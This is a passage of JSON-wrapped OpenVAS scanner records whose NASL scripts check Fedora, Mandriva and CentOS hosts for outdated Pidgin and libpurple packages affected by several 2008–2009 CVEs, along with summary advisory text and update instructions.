value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2008-2927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 9 FEDORA-2009-5552 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500488\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500490\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500491\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500493\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-docs\", rpm:\"pidgin-docs~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~2.5.6~1.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-5583.", "modified": "2018-04-06T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:136141256231064103", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064103", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-5583 (pidgin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5583.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5583 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis is a bugfix & security fix release of Pidgin. The full ChangeLog is\navailable at http://developer.pidgin.im/wiki/ChangeLog Details of the\nsecurity fixes included are available at http://www.pidgin.im/news/security/\n\nChangeLog:\n\n* Wed May 20 2009 Stu Tomlinson 2.5.6-1\n- 2.5.6\n* Mon Apr 20 2009 Warren Togami 2.5.5-3\n- F12+ removed krb4\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update pidgin' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5583\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-5583.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64103\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2008-2927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-5583 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500488\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500490\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500491\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500493\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-docs\", rpm:\"pidgin-docs~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:57:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "The remote host is missing an update to pidgin\nannounced via advisory MDVSA-2009:147.", "modified": "2017-07-06T00:00:00", "published": "2009-07-06T00:00:00", "id": "OPENVAS:64343", "href": "http://plugins.openvas.org/nasl.php?oid=64343", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:147 (pidgin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_147.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:147 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Security vulnerabilities has been identified and fixed in pidgin:\n\nBuffer overflow in the XMPP SOCKS5 bytestream server in Pidgin\n(formerly Gaim) before 2.5.6 allows remote authenticated users to\nexecute arbitrary code via vectors involving an outbound XMPP file\ntransfer. NOTE: some of these details are obtained from third party\ninformation (CVE-2009-1373).\n\nBuffer overflow in the decrypt_out function in Pidgin (formerly Gaim)\nbefore 2.5.6 allows remote attackers to cause a denial of service\n(application crash) via a QQ packet (CVE-2009-1374).\n\nThe PurpleCircBuffer implementation in Pidgin (formerly Gaim) before\n2.5.6 does not properly maintain a certain buffer, which allows\nremote attackers to cause a denial of service (memory corruption\nand application crash) via vectors involving the (1) XMPP or (2)\nSametime protocol (CVE-2009-1375).\n\nMultiple integer overflows in the msn_slplink_process_msg functions in\nthe MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and\n(2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim)\nbefore 2.5.6 on 32-bit platforms allow remote attackers to execute\narbitrary code via a malformed SLP message with a crafted offset\nvalue, leading to buffer overflows. NOTE: this issue exists because\nof an incomplete fix for CVE-2008-2927 (CVE-2009-1376).\n\nThis update provides pidgin 2.5.8, which is not vulnerable to these\nissues.\n\nAffected: 2009.0, 2009.1\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:147\nhttp://pidgin.im/news/security/\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory MDVSA-2009:147.\";\n\n \n\nif(description)\n{\n script_id(64343);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-06 20:36:15 +0200 (Mon, 06 Jul 2009)\");\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2008-2927\", \"CVE-2009-1376\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:147 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libfinch0\", rpm:\"libfinch0~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple0\", rpm:\"libpurple0~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-bonjour\", rpm:\"pidgin-bonjour~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-client\", rpm:\"pidgin-client~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-gevolution\", rpm:\"pidgin-gevolution~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-i18n\", rpm:\"pidgin-i18n~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-meanwhile\", rpm:\"pidgin-meanwhile~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-mono\", rpm:\"pidgin-mono~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-plugins\", rpm:\"pidgin-plugins~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-silc\", rpm:\"pidgin-silc~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-tcl\", rpm:\"pidgin-tcl~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64finch0\", rpm:\"lib64finch0~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64purple0\", rpm:\"lib64purple0~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64purple-devel\", rpm:\"lib64purple-devel~2.5.8~0.2mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libfinch0\", rpm:\"libfinch0~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple0\", rpm:\"libpurple0~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-bonjour\", rpm:\"pidgin-bonjour~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-client\", rpm:\"pidgin-client~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-gevolution\", rpm:\"pidgin-gevolution~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-i18n\", rpm:\"pidgin-i18n~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-meanwhile\", rpm:\"pidgin-meanwhile~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-mono\", rpm:\"pidgin-mono~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-plugins\", rpm:\"pidgin-plugins~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-silc\", rpm:\"pidgin-silc~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-tcl\", rpm:\"pidgin-tcl~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64finch0\", rpm:\"lib64finch0~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64purple0\", rpm:\"lib64purple0~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64purple-devel\", rpm:\"lib64purple-devel~2.5.8~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-5583.", "modified": "2017-07-10T00:00:00", "published": "2009-06-05T00:00:00", "id": "OPENVAS:64103", "href": "http://plugins.openvas.org/nasl.php?oid=64103", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-5583 (pidgin)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_5583.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-5583 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis is a bugfix & security fix release of Pidgin. The full ChangeLog is\navailable at http://developer.pidgin.im/wiki/ChangeLog Details of the\nsecurity fixes included are available at http://www.pidgin.im/news/security/\n\nChangeLog:\n\n* Wed May 20 2009 Stu Tomlinson 2.5.6-1\n- 2.5.6\n* Mon Apr 20 2009 Warren Togami 2.5.5-3\n- F12+ removed krb4\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update pidgin' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-5583\";\ntag_summary = \"The remote host is missing an update to pidgin\nannounced via advisory FEDORA-2009-5583.\";\n\n\n\nif(description)\n{\n script_id(64103);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2008-2927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-5583 (pidgin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500488\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500490\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500491\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=500493\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"finch\", rpm:\"finch~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"finch-devel\", rpm:\"finch-devel~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple\", rpm:\"libpurple~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-devel\", rpm:\"libpurple-devel~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-perl\", rpm:\"libpurple-perl~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libpurple-tcl\", rpm:\"libpurple-tcl~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-devel\", rpm:\"pidgin-devel~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-docs\", rpm:\"pidgin-docs~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-perl\", rpm:\"pidgin-perl~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"pidgin-debuginfo\", rpm:\"pidgin-debuginfo~2.5.6~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "The remote host is missing updates to pidgin announced in\nadvisory CESA-2009:1060.", "modified": "2017-07-10T00:00:00", "published": "2009-05-25T00:00:00", "id": "OPENVAS:64052", "href": "http://plugins.openvas.org/nasl.php?oid=64052", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1060 (pidgin)", "sourceData": "#CESA-2009:1060 64052 3\n# $Id: ovcesa2009_1060.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1060 (pidgin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1060\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1060\nhttps://rhn.redhat.com/errata/RHSA-2009-1060.html\";\ntag_summary = \"The remote host is missing updates to pidgin announced in\nadvisory CESA-2009:1060.\";\n\n\n\nif(description)\n{\n script_id(64052);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-1373\", \"CVE-2009-1374\", \"CVE-2009-1375\", \"CVE-2009-1376\", \"CVE-2008-2927\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n 